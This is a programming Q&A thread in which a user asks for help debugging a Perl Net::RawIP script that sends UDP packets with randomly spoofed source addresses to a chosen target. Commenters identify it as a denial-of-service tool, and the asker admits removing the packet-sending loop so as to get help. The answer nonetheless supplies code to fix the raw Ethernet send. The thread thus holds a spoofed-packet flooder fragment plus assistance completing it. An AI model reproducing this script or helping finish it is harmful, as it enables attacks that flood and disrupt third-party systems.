# RawIP : Cant discover MAC ADDRESS

Tags: perl

*My environment is ubuntu. Machine hosted on digitalocean*

The following is a part of code and gives this error:

> Can't discover MAC address for 157.5.172.182

```
#!/usr/bin/perl

use Net::RawIP;

($dest, $count, $port) = split(/\s+/, "@ARGV");
$opt = @ARGV;

print "+----------------------------------+\n";
print "Destination: $dest\n";
print "Source: Random\n";
print "Port: $port\n";
print "+----------------------------------+\n";

$saddr = join(".", map int rand 256, 1 .. 4);
$rsport = int rand(65535);

$packet =  Net::RawIP->new({
    ip => {
        saddr => $saddr,
        daddr => $dest,
    },

    udp => {
        source => $rsport,
        dest => $port,
        data => "\xFF\xFF\xFF\xFFping",
    },
});

$packet->send;
$packet->ethnew("eth0");
$packet->ethset(source => $saddr, dest => $dest);    
$packet->ethsend;
}
```

Comment: Note: Ethernet related methods are implemented on *`Linux`* and *`*BSD`* only.

Comment: What's your environment? I can't reproduce this error with this code! Please post complete sample!

Comment: I'm using ubuntu. Using digitalocean server.

Comment: $packet->ethset(source => $saddr, dest => $dest); Here I get error

Comment: @F.Hauri added full code.

Comment: This code is malicious. It's a poorly written attempt at a denial-of-service tool. We will not help you debug it.

Comment: It is a part of my code as asked a "sample code". Nowhere related to what you say

Comment: Hmm, as @duskwuff said: this look not well! What's the goal of this!

Comment: Used to stress test my own protection

Comment: Can you explain what you are trying to test using this script? And why you (partially) removed the code to send multiple packets in an edit?

Comment: If I didn't removed i wasn't gonna get help, so..

Answer (score 0):

Seems that `arp_lookup` function used to get the mac-addresses not working, i'm not sure why but you can do something like this (manually):

```
use Net::ARP;

$dest_mac = "ff:ff:ff:ff:ff:ff";
$src_mac  = Net::ARP::get_mac("eth0");

$packet->ethnew("eth0");
$packet->ethset(source => $src_mac, dest => $dest_mac);
```